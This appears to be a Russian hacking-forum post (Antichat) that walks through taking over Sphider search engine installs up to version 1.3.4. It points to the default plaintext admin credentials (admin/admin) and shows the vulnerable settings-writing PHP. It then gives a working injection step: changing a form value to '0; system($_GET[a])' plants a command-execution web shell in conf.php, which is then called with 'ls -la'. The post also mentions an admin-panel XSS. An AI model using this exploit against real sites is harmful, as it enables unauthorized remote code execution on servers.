Форум АНТИЧАТ - [sphider] Заливка шелла

Powered by http://www.sphider.eu/sphider-logo.png <=1.3.4

В Задании 003, где требовалось залить шелл был обнаружен этот движок. роспознал я его сразу, так как у самого когда то стоял такой. Сразу же полез на локалхост посмотреть сорцы. Оказалось что довольно просто залить шелл из админки.

Логин и пасс хранять не в зашифрованом виде в
http://site.com/sphider/admin/auth.php
Дефолт:

PHP код:


		
			
    error_reporting(E_ERROR | E_PARSE);    

    $admin = "admin";

    $admin_pw = "admin";

Собственно заливка шелла
Уязвимый код:

PHP код:


		
			
if ($_index_pdf=="") {

    $_index_pdf=0;

} 

...

        fwrite($fhandle, "\n\n// Index pdf files\n");

        fwrite($fhandle,"$"."index_pdf    = ".$_index_pdf. ";");

Удобнее это делать в опере. Идем в сорс и меняем это:

Код HTML:

<input name="_index_pdf" type="checkbox" value="0" id="index_pdf" >

на это:

Код HTML:

<input name="_index_pdf" type="checkbox" value="0; system($_GET[a])" id="index_pdf" >

Сохраняем настройки.
В итоге имеем:

PHP код:


		
			
// Index pdf files

$index_pdf    = 0; echo($_GET[a]);

http://site.com/sphider/settings/conf.php?a=ls -la

По иронии судьбы на том сайте что в задании прав на запись не хватало.

Также в админке есть xss. Но пользы мало, так как мы уже в админке).